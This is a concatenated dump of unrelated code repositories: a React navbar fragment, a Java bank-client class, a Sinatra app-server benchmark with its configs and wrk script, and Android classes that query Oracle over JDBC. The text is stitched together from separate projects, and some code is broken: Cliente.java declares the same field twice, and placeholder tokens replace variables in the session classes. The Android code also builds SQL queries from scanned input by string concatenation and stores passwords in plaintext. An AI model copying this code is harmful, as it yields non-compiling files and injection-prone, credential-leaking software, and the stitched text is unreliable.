<Link to="/">Got it Made</Link>
</Navbar.Brand>
<Navbar.Toggle aria-controls="basic-navbar-nav" />
<Navbar.Collapse id="basic-navbar-nav" className="justify-content-end">
<Nav>
<Nav.Link>
<Link to="/">Home</Link>
</Nav.Link>
<Nav.Link>
<Link to="/about">About</Link>
</Nav.Link>
<Nav.Link>
<Link to="/contactus">Contact Us</Link>
</Nav.Link>
</Nav>
</Navbar.Collapse>
</Navbar>
<div>
{/* A <Switch> looks through its children <Route>s and
renders the first one that matches the current URL. */}
<Switch>
<Route path="/about">
<About />
</Route>
<Route path="/contactus">
<ContactUs />
</Route>
</Switch>
</div>
</Router>
);
}
export default App;
| b244c45062643891947903cbd91e11d023bff231 | [
"JavaScript"
] | 2 | JavaScript | Aboutique1/Project3 | 218f4596c0cfe3184cd04c234c05c3dd4a4595bf | fa5f7f15ab29d3cc01588aa8011093815bf2d424 |
refs/heads/main | <file_sep>package br.com.bancooo.model;
import java.util.ArrayList;
import java.util.Date;
import java.util.List;
public class Cliente {
private String cpf;
private String nome;
private String telefone;
private String sexo;
private String naturalidade;
private Date nascimento;
private List<Endereco> Endereco = new ArrayList<Endereco>();
private br.com.bancooo.model.Endereco Endereco;
public String getCpf() {
return cpf;
}
public void setCpf(String cpf) {
this.cpf = cpf;
}
public String getNome() {
return nome;
}
public void setNome(String nome) {
this.nome = nome;
}
public String getTelefone() {
return telefone;
}
public void setTelefone(String telefone) {
this.telefone = telefone;
}
public String getSexo() {
return sexo;
}
public void setSexo(String sexo) {
this.sexo = sexo;
}
public String getNaturalidade() {
return naturalidade;
}
public void setNaturalidade(String naturalidade) {
this.naturalidade = naturalidade;
}
public Date getNascimento() {
return nascimento;
}
public void setNascimento(Date nascimento) {
this.nascimento = nascimento;
}
public void ListaEnderecos(){
for (Endereco endereco: this.Endereco){
System.out.println("Endereço");
System.out.println("Cep: " + endereco.getCep());
System.out.println("Logradouro: " + endereco.getLogradouro());
System.out.println("Numero: " + endereco.getNumero());
System.out.println("Complemento: " + endereco.getComplemento());
System.out.println("Cidade: " + endereco.getCidade());
System.out.println("UF: " + endereco.getUf());
}
}
}
<file_sep># BancoOO
Projeto acadêmico de banco financeiro
| 8d6852cad4db797850aa5c23926bbe09e6bc92b7 | [
"Markdown",
"Java"
] | 2 | Java | HenriqueMoreira4/BancoOO | f34aaa493ca85ff46701eb17b5741ec85cf1d7bf | 65d7368301ca7d1cdabdacc22aa2714f4e359453 |
refs/heads/master | <file_sep># --
# basic sinatra app to do three things:
# * tell you what app server is running this code (/server)
# * compute pi to 10,000 decimal places as a pseudo-task to fake real work
# * do a twitter search, simulating network wait
# Sinatra app used to compare Ruby application servers. Each endpoint
# exercises a different workload shape: report the running server, burn CPU
# (pi), block on sleep, mix workloads at random, or hit ActiveRecord.
class AppServerArena < Sinatra::Base
  get '/' do
    index
  end

  get '/server' do
    server
  end

  get '/pi' do
    pi
  end

  get '/sleep' do
    do_sleep
  end

  get '/random' do
    do_random
  end

  get '/active_record' do
    do_active_record
  end

  private

  # Weighted random workload: ~50% cheap (/server), ~20% blocking (/sleep),
  # ~30% CPU-bound (/pi).
  def do_random
    num = 1 + rand(10) # random number b/t 1 and 10
    case num
    when 1..5
      server
    when 6..7
      do_sleep
    else
      pi
    end
  end

  # Simulates waiting on slow I/O by blocking the worker for one second.
  def do_sleep
    sleep 1
    erb :sleep
  end

  def server
    # Figure out which app server we're running under
    @current_server = app_server
    # Set the request and response objects for page rendering
    @request = request
    @response = response
    erb :server
  end

  # CPU-bound pseudo-work: compute pi to 5,000 decimal places.
  def pi
    @pi = calc_pi(5_000)
    erb :pi
  end

  def index
    erb :index
  end

  # Database-bound workload via ActiveRecord (see config.ru for the sqlite setup).
  def do_active_record
    @users = User.all
    erb :active_record
  end

  # Builds an OAuth access token from config/twitter.yml credentials.
  # NOTE(review): currently unreferenced by any route — confirm before removing.
  def twitter_consumer
    creds = YAML.load_file(File.join(File.dirname(__FILE__), 'config', 'twitter.yml'))
    consumer = OAuth::Consumer.new(creds["consumer_key"], creds["consumer_secret"],
      {
        site: 'https://api.twitter.com',
        scheme: :header
      }
    )
    token_hash = { oauth_token: creds["oauth_token"], oauth_token_secret: creds["oauth_secret"] }
    return OAuth::AccessToken.from_hash(consumer, token_hash)
  end

  # Detects the app server by probing for its top-level module constant.
  def app_server
    # Figure out which server we're running under
    ["Rainbows", "Puma", "Thin", "Unicorn", "PhusionPassenger", "Rhebok"].each do |s|
      if Module.const_defined? s
        return s
      end
    end
    # No return yet, push out nil because we don't know the app server.
    return nil
  end

  # These two methods are a semi-computationally expensive task, simulating
  # real work without handing control to IO (database, HTTP, files, ...).
  # Found at stack overflow:
  # http://stackoverflow.com/questions/3137594/how-to-create-pi-sequentially-in-ruby
  # Fixed-point arccotangent via the Taylor series, scaled by `unity`.
  def arccot(x, unity)
    xpow = unity / x
    n = 1
    sign = 1
    sum = 0
    loop do
      term = xpow / n
      break if term == 0
      sum += sign * (xpow/n)
      xpow /= x*x
      n += 2
      sign = -sign
    end
    sum
  end

  # Machin's formula: pi = 16*arccot(5) - 4*arccot(239), with extra fudge
  # digits to absorb rounding in the fixed-point arithmetic.
  def calc_pi(digits = 10000)
    fudge = 10
    unity = 10**(digits+fudge)
    pi = 4*(4*arccot(5, unity) - arccot(239, unity))
    pi / (10**fudge)
  end
end
<file_sep>load :rack, :self_signed_tls, :supervisor
rack 'benchmark.local', :self_signed_tls
<file_sep>worker_processes 5
listen 3000
<file_sep>#!/bin/sh
# Launch the NGINX Unit control daemon on the local control socket.
sudo unitd --control 127.0.0.1:8080
# Register this app with Unit: a listener on *:3000 routed to the Ruby
# application rooted at config.ru.
curl -X PUT --data-binary '{ "listeners": { "*:3000": { "pass": "applications/ruby_app" } }, "applications": { "ruby_app": { "type": "ruby", "working_directory": "/home/yaginuma/program/ruby/app-server-arena", "script": "config.ru" } } }' http://127.0.0.1:8080/config
<file_sep>source 'https://rubygems.org'
gem 'sinatra'
gem 'json'
gem 'oauth'
gem 'rails'
gem 'sqlite3'

# Debugging tools only; not loaded in production.
group :development, :test do
  gem 'byebug'
end

# The application servers being benchmarked against each other.
group :app_servers do
  gem 'puma'
  gem 'unicorn'
  gem 'falcon'
  gem 'iodine'
end
<file_sep>require 'sinatra/base'
require 'yaml'
require 'oauth'
require 'json'
require 'logger'
require 'active_record'
require_relative 'user'
# Load the gem groups for the current environment (default when RACK_ENV unset).
Bundler.require(ENV['RACK_ENV'] || :default)

# Local sqlite database used by the /active_record workload, logged to stdout.
ActiveRecord::Base.establish_connection(adapter: 'sqlite3', database: 'tmp/db')
ActiveRecord::Base.logger = Logger.new(STDOUT)

require './app.rb'
run AppServerArena
<file_sep>#!/bin/sh
# App server under test — only used to name the results directory:
# passenger / puma / raptor(passenger 5) / rhebok / thin / unicorn
SERVER=puma
# wrk load parameters: worker threads, open connections, run duration.
THREAD=10
CONNECTION=100
DURATION=3s
# Start from a clean results directory for this server.
rm -rf result/${SERVER}
mkdir result/${SERVER}
# One wrk run per endpoint; stdout and stderr captured per endpoint.
wrk -t ${THREAD} -c ${CONNECTION} -d ${DURATION} http://localhost:3000/sleep > result/${SERVER}/sleep.txt 2>&1
wrk -t ${THREAD} -c ${CONNECTION} -d ${DURATION} http://localhost:3000/pi > result/${SERVER}/pi.txt 2>&1
wrk -t ${THREAD} -c ${CONNECTION} -d ${DURATION} http://localhost:3000/server > result/${SERVER}/server.txt 2>&1
wrk -t ${THREAD} -c ${CONNECTION} -d ${DURATION} http://localhost:3000/random > result/${SERVER}/random.txt 2>&1
wrk -t ${THREAD} -c ${CONNECTION} -d ${DURATION} http://localhost:3000/active_record > result/${SERVER}/active_record.txt 2>&1
<file_sep>max_threads_count = 5
# Pin min == max so the thread pool size is fixed while benchmarking.
min_threads_count = max_threads_count
threads min_threads_count, max_threads_count

# Bind port and environment, overridable via PORT / RACK_ENV.
port ENV.fetch("PORT") { 3000 }
environment ENV.fetch("RACK_ENV") { "development" }
| 82f38c76e55cd544125ef180611f4aae60be06ef | [
"Ruby",
"Shell"
] | 8 | Ruby | y-yagi/app-server-arena | f0783b7f65c9192c6f0b2e34f90612ec8ce17b1f | f43124c7aebb33e0b49480fe182b85add9634fd1 |
refs/heads/master | <file_sep>include ':app', ':ojdbc14', ':zxing'
<file_sep>package com.quick.completionassygt;
import android.util.Log;
import java.sql.DriverManager;
import java.sql.SQLException;
/**
* Created by Admin on 8/21/2017.
*/
/**
 * Thin helper around the Oracle thin JDBC driver.
 */
public class Koneksi {
    /**
     * Opens a JDBC connection to jdbc:oracle:thin:@serverName:port:sid.
     *
     * @return an open {@link java.sql.Connection}, or {@code null} when the
     *         driver is missing or the connection attempt fails — callers
     *         must null-check before use.
     */
    public java.sql.Connection getConnection(String serverName, String port, String sid, String username, String password) {
        try {
            Class.forName("oracle.jdbc.driver.OracleDriver");
            String url = "jdbc:oracle:thin:@" + serverName + ":" + port + ":" + sid;
            // Security fix: the old log line appended the username AND the
            // password to the debug log; never log credentials.
            Log.d("Koneksi", "Connected to database->" + url);
            return DriverManager.getConnection(url, username, password);
        } catch (ClassNotFoundException | SQLException e) {
            e.printStackTrace();
        }
        return null;
    }
}
<file_sep>package com.quick.completionassygt;
import android.content.Context;
import android.os.Handler;
import android.util.Log;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.view.animation.Animation;
import android.view.animation.AnimationUtils;
import android.widget.AdapterView;
import android.widget.TextView;
import androidx.cardview.widget.CardView;
import androidx.recyclerview.widget.RecyclerView;
import java.io.InputStream;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.Scanner;
/**
* Created by Admin on 9/2/2017.
*/
/**
 * RecyclerView adapter that renders job rows directly from a live, scrollable
 * JDBC {@link ResultSet}: every bind repositions the cursor with
 * ResultSet.absolute(position + 1), so the ResultSet must stay open for the
 * adapter's whole lifetime. Rows slide in from the left with a staggered
 * delay the first time they are bound.
 */
public class RecyclerCompletion extends RecyclerView.Adapter<RecyclerCompletion.ViewHolder> {

    private Context mContext;
    private ResultSet mResult;                    // scrollable result set backing the list
    final private ItemClickListener mItemClickListener;
    private Boolean mState;                       // true = rows highlighted yellow and click-disabled
    Runnable runnable;                            // most recent animation/control runnable
    int delayAnimate = 300;                       // grows per bound row to stagger slide-ins
    int itemCount;
    Handler controlDelay = new Handler();         // watchdog that resets delayAnimate when idle
    int bindPos, lastBindPos, lastGetDelay;

    public RecyclerCompletion(Context context, ResultSet result, ItemClickListener listener, Boolean state) {
        mContext = context;
        mResult = result;
        mItemClickListener = listener;
        // NOTE(review): the first assignment is a dead store immediately
        // overwritten by the second.
        mState = false;
        mState = state;
    }

    /** Callback fired with the clicked row's job data. */
    public interface ItemClickListener {
        void OnItemClick(String jobName, String jobId, String item, String qtyAvail, String qtyComplete);
    }

    /**
     * Counts rows by jumping the cursor to the last row.
     * NOTE(review): this moves the shared cursor as a side effect and
     * returns 0 on any SQLException.
     */
    @Override
    public int getItemCount() {
        try {
            mResult.last();
            itemCount = mResult.getRow();
            return itemCount;
        } catch (SQLException e) {
            e.printStackTrace();
        }
        return 0;
    }

    @Override
    public ViewHolder onCreateViewHolder(ViewGroup parent, int viewType) {
        LayoutInflater inflater = LayoutInflater.from(parent.getContext());
        View view = inflater.inflate(R.layout.row_list_job, parent, false);
        return new ViewHolder(view);
    }

    @Override
    public void onBindViewHolder(ViewHolder holder, int position) {
        // bindPos changes on every bind.
        bindPos = position;
        // lastBindPos tracks the furthest row bound so far (scroll-down depth).
        if (position > lastBindPos) {
            lastBindPos = bindPos;
        }
        try {
            // JDBC rows are 1-based, adapter positions are 0-based.
            mResult.absolute(position + 1);
            String job = readStream(mResult.getAsciiStream(1));
            String tgl = readStream(mResult.getAsciiStream(2));
            String qtyStart = mResult.getString(3);
            String qtyComplete = mResult.getString(4);
            String status = mResult.getString(6);
            String item = readStream(mResult.getAsciiStream(8));
            String desc =readStream(mResult.getAsciiStream(9));
            holder.tv_job.setText(job);
            holder.tv_tgl.setText(tgl);
            holder.tv_qtyStart.setText(qtyStart);
            holder.tv_qtyComplete.setText(qtyComplete);
            holder.tv_item.setText(item);
            holder.tv_desc.setText(desc);
            // status "0" is flagged in red, anything else uses the normal color.
            if(status.equals("0")){
                holder.tv_tgl.setTextColor(mContext.getResources().getColor(R.color.red));
            }else {
                holder.tv_tgl.setTextColor(mContext.getResources().getColor(R.color.font));
            }
            // The animation is only meant to play on first-time binds.
            Log.d("Cursor Posisi", "" + bindPos);
            Log.d("Bind Posisi", "" + lastBindPos);
        } catch (SQLException e) {
            e.printStackTrace();
        }
        holder.cv_parent.setCardBackgroundColor(mContext.getResources().getColor(R.color.white));
        if (mState){
            // Locked mode: highlight rows and disable clicks.
            holder.cv_parent.setCardBackgroundColor(mContext.getResources().getColor(R.color.yellow));
            holder.cv_parent.setEnabled(false);
        }else {
            holder.cv_parent.setCardBackgroundColor(mContext.getResources().getColor(R.color.white));
            // Animate only rows being bound for the first time.
            if (bindPos == lastBindPos && lastBindPos < itemCount) {
                holder.cv_parent.setVisibility(View.INVISIBLE);
                setAnimation(holder.cv_parent);
                controlDelay();
                if (lastBindPos + 1 == itemCount) {
                    lastBindPos += 1;
                }
            }
        }
    }

    /** Slides the view in from the left after the current staggered delay. */
    private void setAnimation(final View view) {
        Handler handler = new Handler();
        handler.postDelayed(new Runnable() {
            public void run() {
                Animation animation = AnimationUtils.loadAnimation(mContext, android.R.anim.slide_in_left);
                if (view != null) {
                    view.startAnimation(animation);
                    view.setVisibility(View.VISIBLE);
                    runnable = this;
                    Log.d("Animate", "running");
                }
            }
        }, delayAnimate);
        delayAnimate += 300;
    }

    // Resets the stagger delay back to 0 once no new animation has been
    // scheduled for a while (delayAnimate stopped growing).
    void controlDelay() {
        controlDelay.postDelayed(new Runnable() {
            @Override
            public void run() {
                runnable = this;
                if (lastGetDelay == delayAnimate) {
                    delayAnimate = 0;
                    controlDelay.removeCallbacks(runnable);
                    Log.d("ControlDelay", "OFF");
                } else {
                    controlDelay.postDelayed(runnable, 600);
                    Log.d("ControlDelay", "ON");
                    lastGetDelay = delayAnimate;
                }
            }
        }, 600);
    }

    /** Reads an entire ASCII stream into a String ("\\A" = whole input). */
    private String readStream(InputStream data) {
        Scanner s = new Scanner(data).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";
    }

    /** Row holder; the whole card is clickable and re-reads its row on click. */
    class ViewHolder extends RecyclerView.ViewHolder implements AdapterView.OnClickListener {
        CardView cv_parent;
        TextView tv_job, tv_tgl, tv_qtyStart, tv_qtyComplete, tv_item, tv_desc;

        public ViewHolder(View itemView) {
            super(itemView);
            cv_parent = (CardView) itemView.findViewById(R.id.cv_parent);
            tv_job = (TextView) itemView.findViewById(R.id.tv_job);
            tv_tgl = (TextView) itemView.findViewById(R.id.tv_tgl);
            tv_qtyStart = (TextView) itemView.findViewById(R.id.tv_qtyStart);
            tv_qtyComplete = (TextView) itemView.findViewById(R.id.tv_qtyComplete);
            tv_item = (TextView) itemView.findViewById(R.id.tv_item);
            tv_desc = (TextView) itemView.findViewById(R.id.tv_desc);
            cv_parent.setOnClickListener(this);
        }

        @Override
        public void onClick(View v) {
            try {
                // Reposition the cursor to this row and hand its data to the listener.
                mResult.absolute(getAdapterPosition() + 1);
                String jobName = readStream(mResult.getAsciiStream(1));
                String jobId = mResult.getString(7);
                String qtyAvail = mResult.getString(5);
                String qtyComplete = mResult.getString(4);
                String item = readStream(mResult.getAsciiStream(8));
                mItemClickListener.OnItemClick(jobName, jobId, item, qtyAvail, qtyComplete);
            } catch (SQLException e) {
                e.printStackTrace();
            }
        }

        // NOTE(review): duplicate of the outer class's readStream helper.
        private String readStream(InputStream data) {
            Scanner s = new Scanner(data).useDelimiter("\\A");
            return s.hasNext() ? s.next() : "";
        }
    }
}
<file_sep>package com.quick.completionassygt;
import android.content.Context;
import android.content.Intent;
import android.content.SharedPreferences;
import java.sql.Connection;
import java.util.HashMap;
/**
 * Session manager backed by SharedPreferences: stores the logged-in user's
 * credentials plus the Oracle connection parameters (cName/cPort/cSid/...)
 * and opens DB connections from them.
 *
 * NOTE(review): the user's password and the DB credentials are stored in
 * plaintext in SharedPreferences — a known security concern in this app.
 */
class ManagerSessionUserOracle {
    private SharedPreferences pref;
    private static final String PREF_NAME = "session";
    private final String KEY_IS_LOGIN = "isLogin";
    static final String KEY_USERNAME = "username";
    static final String KEY_PASSWORD = "<PASSWORD>"; // NOTE(review): anonymized placeholder in this dump
    static final String KEY_USEID = "user_id";
    // Oracle connection parameters (host, port, SID, DB credentials).
    static final String KEY_cName = "cName";
    static final String KEY_cPort = "cPort";
    static final String KEY_cSid = "cSid";
    static final String KEY_cUsername = "cUsername";
    static final String KEY_cPassword = "<PASSWORD>"; // NOTE(review): anonymized placeholder in this dump
    static final String KEY_PERSON = "person";
    Context mContext;

    ManagerSessionUserOracle(Context context) {
        mContext = context;
        pref = mContext.getSharedPreferences(PREF_NAME, 0);//PrivateMode
    }

    /** Persists a full login session: user identity + DB connection params. */
    void createUserSession(String username, String password, String userid,
                           String cName, String cPort, String cSid, String cUsername, String cPassword, String person) {
        SharedPreferences.Editor edit;
        edit = pref.edit();
        edit.putBoolean(KEY_IS_LOGIN, true);
        edit.putString(KEY_USERNAME, username);
        edit.putString(KEY_PASSWORD, <PASSWORD>); // NOTE(review): anonymized token in this dump (presumably `password`)
        edit.putString(KEY_USEID, userid);
        edit.putString(KEY_cName, cName);
        edit.putString(KEY_cPort, cPort);
        edit.putString(KEY_cSid, cSid);
        edit.putString(KEY_cUsername, cUsername);
        edit.putString(KEY_cPassword, cPassword);
        edit.putString(KEY_PERSON, person);
        edit.apply();
    }

    /** Returns every stored session value keyed by the KEY_* constants. */
    HashMap<String, String> getUserData() {
        HashMap<String, String> userData = new HashMap<>();
        userData.put(KEY_USERNAME, pref.getString(KEY_USERNAME, null));
        userData.put(KEY_PASSWORD, pref.getString(KEY_PASSWORD, null));
        userData.put(KEY_USEID, pref.getString(KEY_USEID, null));
        userData.put(KEY_cName, pref.getString(KEY_cName, null));
        userData.put(KEY_cPort, pref.getString(KEY_cPort, null));
        userData.put(KEY_cSid, pref.getString(KEY_cSid, null));
        userData.put(KEY_cUsername, pref.getString(KEY_cUsername, null));
        userData.put(KEY_cPassword, pref.getString(KEY_cPassword, null));
        userData.put(KEY_PERSON, pref.getString(KEY_PERSON, null));
        return userData;
    }

    /** Stored Oracle SID, or "" when absent. */
    String getSID() {
        return pref.getString(KEY_cSid, "");
    }

    /** Stored username, or "" when absent. */
    String getUser() {
        return pref.getString(KEY_USERNAME, "");
    }

    /** Stored user id, or null when absent. */
    String getUserId() {
        return pref.getString(KEY_USEID, null);
    }

    Boolean isUserLogin() {
        return pref.getBoolean(KEY_IS_LOGIN, false);
    }

    /** Clears the whole session and redirects to the login screen. */
    public void logoutUser() {
        pref.edit().clear().apply();
        // After logout redirect user to Login Activity
        Intent i = new Intent(mContext, LoginActivity.class);
        // Closing all the Activities
        i.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TOP);
        // Add new Flag to start new Activity
        i.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        // Starting Login Activity
        mContext.startActivity(i);
    }

    /** Opens a JDBC connection using the stored Oracle parameters (may be null). */
    Connection connectDb() {
        HashMap<String, String> userData = getUserData();
        String cName = userData.get(KEY_cName);
        String cPort = userData.get(KEY_cPort);
        String cSid = userData.get(KEY_cSid);
        String cUsername = userData.get(KEY_cUsername);
        String cPassword = userData.get(KEY_cPassword);
        return new Koneksi().getConnection(cName, cPort, cSid, cUsername, cPassword);
    }
}
<file_sep>package com.quick.completionassygt.Rest;
import com.quick.completionassygt.Model.Login_Model;
import com.quick.completionassygt.Model.User_Model;
import retrofit2.Call;
import retrofit2.http.Field;
import retrofit2.http.FormUrlEncoded;
import retrofit2.http.POST;
/**
 * Retrofit endpoint definitions for the authentication backend.
 */
public interface API_Link {
    /** Authenticates a user; form-encoded POST with username + password. */
    @FormUrlEncoded
    @POST("loginAndroid")
    Call<Login_Model> login(@Field("username") String user, @Field("password") String password);

    @FormUrlEncoded
    @POST("logUser")
    Call<User_Model> loguser(@Field("username") String user); // API to check whether the user is registered
}
<file_sep>package com.quick.completionassygt;
import android.content.Context;
import android.content.Intent;
import android.content.SharedPreferences;
import java.util.HashMap;
/**
 * Minimal SharedPreferences-backed session: stores only the logged-in
 * user's username and password.
 *
 * NOTE(review): the password is stored in plaintext — a security concern.
 */
public class ManageSessionUser {
    private SharedPreferences preferences;
    private static final String PREF_NAME = "session";
    private final String KEY_IS_LOGIN = "isLogin";
    static final String KEY_USERNAME = "username";
    static final String KEY_PASSWORD = "<PASSWORD>"; // NOTE(review): anonymized placeholder in this dump
    Context mContext;

    ManageSessionUser(Context context) {
        mContext = context;
        preferences = mContext.getSharedPreferences(PREF_NAME, 0); //PrivateMode
    }

    /** Marks the user as logged in and persists the credentials. */
    void createUserSession(String username, String password) {
        SharedPreferences.Editor edit;
        edit = preferences.edit();
        edit.putBoolean(KEY_IS_LOGIN, true);
        edit.putString(KEY_USERNAME, username);
        edit.putString(KEY_PASSWORD, <PASSWORD>); // NOTE(review): anonymized token in this dump (presumably `password`)
        edit.apply();
    }

    /** Returns the stored username/password keyed by the KEY_* constants. */
    HashMap<String, String> getUserData() {
        HashMap<String, String> userData = new HashMap<>();
        userData.put(KEY_USERNAME, preferences.getString(KEY_USERNAME, null));
        userData.put(KEY_PASSWORD, preferences.getString(KEY_PASSWORD, null));
        return userData;
    }

    /** Stored username, or "" when absent. */
    String getUser() {
        return preferences.getString(KEY_USERNAME, "");
    }

    Boolean isUserLogin() {
        return preferences.getBoolean(KEY_IS_LOGIN, false);
    }

    /** Clears the session and redirects to the login screen. */
    public void logoutUser() {
        preferences.edit().clear().apply();
        // After logout redirect user to Login Activity
        Intent i = new Intent(mContext, LoginActivity.class);
        // Closing all the Activities
        i.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TOP);
        // Add new Flag to start new Activity
        i.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        // Starting Login Activity
        mContext.startActivity(i);
    }
}
<file_sep>package com.quick.completionassygt;
import android.Manifest;
import android.content.DialogInterface;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.os.Bundle;
import android.util.Log;
import android.view.KeyEvent;
import android.view.View;
import android.widget.ImageView;
import android.widget.Toast;
import androidx.annotation.NonNull;
import androidx.appcompat.app.AlertDialog;
import androidx.appcompat.app.AppCompatActivity;
import androidx.core.app.ActivityCompat;
import androidx.core.content.ContextCompat;
import androidx.recyclerview.widget.LinearLayoutManager;
import androidx.recyclerview.widget.RecyclerView;
import com.facebook.stetho.Stetho;
import com.google.android.material.dialog.MaterialAlertDialogBuilder;
import com.google.android.material.snackbar.Snackbar;
import com.google.android.material.textfield.TextInputEditText;
import com.google.zxing.client.android.CaptureActivity;
import java.sql.Connection;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import cn.pedant.SweetAlert.SweetAlertDialog;
/**
 * Screen that looks up an open WIP job from a scanned/typed code (job name,
 * item code, or "itemId,serial" body-card pair), lists the matching job in a
 * RecyclerView, and launches the completion flow for the selected row.
 *
 * Data comes from a direct JDBC connection to Oracle EBS WIP/INV tables
 * obtained via ManagerSessionUserOracle.
 *
 * NOTE(review): every query below is built by string concatenation with
 * scanner input — vulnerable to SQL injection; prefer PreparedStatement.
 * NOTE(review): allowNetworkOnMainThread() forces DB I/O onto the UI thread.
 */
public class CompletionActivity extends AppCompatActivity implements RecyclerCompletion.ItemClickListener{
    ImageView iv_scan;
    TextInputEditText et_code;
    Connection mConn;                 // live Oracle connection for all queries below
    ManagerSessionUserOracle session;
    SweetAlertDialog sweetAlertDialog;
    RecyclerView rv_job;
    String mQuery, seqNum = "10";
    String jobName, jobId;
    LinearLayoutManager layoutManager;
    RecyclerCompletion adapter;
    Boolean stateRunnable=false;      // true when the job already has a pending interface row
    String serial = "";               // serial part of an "itemId,serial" body-card scan

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_completion);
        new ModuleTool().allowNetworkOnMainThread();
        Stetho.initializeWithDefaults(this);
        session = new ManagerSessionUserOracle(this);
        mConn = session.connectDb();
        // Show which database instance the session points at.
        if (session.getSID().equals("DEV")) {
            setTitle("Completion [ DEV ]");
        } else {
            setTitle("Completion [ PROD ]");
        }
        iv_scan = findViewById(R.id.iv_scan);
        et_code = findViewById(R.id.et_code);
        rv_job = findViewById(R.id.rv_job);
        // Enter/DPAD-center on the text field triggers the same lookup as a scan.
        et_code.setOnKeyListener(new View.OnKeyListener() {
            @Override
            public boolean onKey(View view, int i, KeyEvent keyEvent) {
                if (keyEvent.getAction() == KeyEvent.ACTION_DOWN) {
                    switch (i) {
                        case KeyEvent.KEYCODE_DPAD_CENTER:
                        case KeyEvent.KEYCODE_ENTER:
                            // Decide how to interpret the input: body card, item code, or job name.
                            if (et_code.getText().toString().contains(",")) {
                                String[] code = et_code.getText().toString().split(",");
                                String item_id = code[0];
                                serial = code[1];
                                jobName = getJobByItemId(item_id);
                            } else if (isAnyMsib(et_code.getText().toString())) {
                                String item_id = getInvItemId(et_code.getText().toString());
                                jobName = getJobByItemId(item_id);
                            } else {
                                jobName = cekJob(et_code.getText().toString());
                            }
                            // "0" is the NVL fallback returned when no released job matched.
                            if (jobName.equals("0")) {
                                if (jobType(jobName)) {
                                    Snackbar.make(getWindow().getDecorView().getRootView(), "Job Non-Standard", Snackbar.LENGTH_LONG)
                                            .show();
                                } else {
                                    Log.e("cek job", "data null");
                                    Snackbar.make(getWindow().getDecorView().getRootView(), "Data tidak tersedia", Snackbar.LENGTH_LONG)
                                            .show();
                                }
                            } else {
                                et_code.setText(jobName);
                                jobId = getJobId(jobName);
                                stateRunnable = isProcessed(jobId);
                                if(stateRunnable){
                                    createRecyclerView(jobName, true);
                                } else {
                                    createRecyclerView(jobName, false);
                                }
                                Log.e("cek job", "ada data");
                            }
                            return true;
                        default:
                            break;
                    }
                }
                return false;
            }
        });
    }

    /** Click handler for the scan icon (wired from the layout). */
    public void scan(View view) {
        runtimePermission();
    }

    /** Requests the camera permission if needed, otherwise starts the ZXing scanner. */
    void runtimePermission() {
        int permissionCheck = ContextCompat.checkSelfPermission(this, Manifest.permission.CAMERA);
        if (permissionCheck == PackageManager.PERMISSION_DENIED) {
            ActivityCompat.requestPermissions(this, new String[]{Manifest.permission.CAMERA}, 26);
        } else {
            //normal
            Intent i = new Intent(this, CaptureActivity.class);
            i.putExtra("TITLE_SCAN", "Scan");
            i.putExtra("SAVE_HISTORY", false);
            i.setAction("com.google.zxing.client.android.SCAN");
            startActivityForResult(i, 0);
        }
    }

    @Override
    public void onRequestPermissionsResult(int requestCode, @NonNull String[] permissions, @NonNull int[] grantResults) {
        super.onRequestPermissionsResult(requestCode, permissions, grantResults);
        // 26 is the camera-permission request issued by runtimePermission().
        if (requestCode == 26 && grantResults[0] == PackageManager.PERMISSION_DENIED) {
            Toast.makeText(this, "Izinkan aplikasi mengakses kamera untuk melakukan SCANN", Toast.LENGTH_SHORT).show();
        } else {
            runtimePermission();
        }
    }

    @Override
    protected void onActivityResult(int requestCode, int resultCode, Intent data) {
        super.onActivityResult(requestCode, resultCode, data);
        // Result from the ZXing scanner started in runtimePermission().
        if (requestCode == 0 && resultCode == RESULT_OK) {
            final String scanContent = data.getStringExtra("SCAN_RESULT");
            Log.d("Scan", scanContent);
            if (scanContent != null) {
                if (scanContent.contains(",")) { // body-card scan: "itemId,serial"
                    String[] code = scanContent.split(",");
                    String item_id = code[0];
                    serial = code[1];
                    jobName = getJobByItemId(item_id);
                } else if (isAnyMsib(scanContent)) { // item-code scan
                    String item_id = getInvItemId(scanContent);
                    jobName = getJobByItemId(item_id);
                } else { // probably a direct job-number scan
                    jobName = cekJob(scanContent);
                }
                if (jobName.equals("0")) {
                    if (jobType(jobName)) {
                        Snackbar.make(getWindow().getDecorView().getRootView(), "Job Non-Standard", Snackbar.LENGTH_LONG)
                                .show();
                    } else {
                        Log.e("cek job", "data null");
                        Snackbar.make(getWindow().getDecorView().getRootView(), "Data tidak tersedia", Snackbar.LENGTH_LONG)
                                .show();
                    }
                } else {
                    et_code.setText(jobName);
                    jobId = getJobId(jobName);
                    stateRunnable = isProcessed(jobId);
                    if(stateRunnable){
                        createRecyclerView(jobName, true);
                    } else {
                        createRecyclerView(jobName, false);
                    }
                    Log.e("cek job", "ada data");
                }
            }
        } else if (resultCode == RESULT_CANCELED) {
            Toast.makeText(getApplicationContext(), "Canceled", Toast.LENGTH_LONG).show();
        }
    }

    /**
     * Expands a raw serial into the item's configured serial format by
     * substituting the "-" placeholder; returns "" when no format exists.
     */
    String translateSerial(String itemId, String serial){
        try{
            Statement statement = mConn.createStatement();
            mQuery = "SELECT serial_format \n" +
                    "FROM khs_serial_code\n" +
                    "WHERE item_id = "+itemId;
            ResultSet result = statement.executeQuery(mQuery);
            if (result.next()){
                String format = result.getString(1);
                return format.replace("-",serial);
            }
        }catch (SQLException e){
            e.printStackTrace();
        }
        return "";
    }

    /**
     * Intended to detect a non-standard job.
     * NOTE(review): as written this returns true whenever the count query
     * executes without an SQLException — the count itself is never read, so
     * the result does not depend on the job. Confirm intended behavior.
     */
    public boolean jobType(String job) {
        Boolean ver;
        ResultSet theResultSet;
        try {
            Statement statement = mConn.createStatement();
            String mQuery = "select count(*)\n" +
                    "from wip_operations wo\n" +
                    " ,wip_entities we\n" +
                    "where wo.WIP_ENTITY_ID = we.WIP_ENTITY_ID\n" +
                    " and we.WIP_ENTITY_NAME = '" + job + "'";
            theResultSet = statement.executeQuery(mQuery);
